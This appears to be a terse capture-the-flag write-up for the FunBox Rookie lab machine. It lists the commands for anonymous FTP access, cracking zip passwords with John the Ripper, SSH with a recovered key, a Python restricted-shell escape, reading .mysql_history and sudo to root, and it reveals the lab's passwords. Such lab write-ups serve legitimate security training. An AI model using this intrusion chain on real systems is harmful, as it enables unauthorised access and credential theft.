FunBox Rookie
RECON — Ip Search
Apache Server

Nmap Scan

nmap -sC -sV 192.168.52.107 

-safe scripts -service version
Anonymous FTP Login available, various visible zip files

ENUMURATION

ftp 192.168.52.107

Name: anonymous 

Password: anonymous@domain.com 

Grab zip Files

 mget homer.zip john.zip tom.zip 

Inspect File
Password locked id_rsa keys

Change zip to Crack Passwords

 zip2john homer.zip homer.hash 

Insall word list

 rockyou.txt 

Organize files into one directory

John the Ripper

 john --wordlist=$rockyou tom.hash 

Extract tom.zip

 iubire 

Id_rsa key

PRIVILEGE ESCALATION

SSH

  ssh -i id_rsa tom@192.168.52.107 

Success logged in as tom

Flag

 cat local.txt  

Restricted Shell

Checking Sudo Privileges
Tom can run all commands definitely worth pursuing

Remove Shell Restrictions

 python3 -c ‘import os; os.system(“/bin/bash”);’ 

Check for hidden files

ls -la 

Reading mysql_history

 cat .mysql_history  

Reveals password

ROOT ESCALATION

Root Flag

 sudo su  

 xx11yy22!  

 cat  proof.txt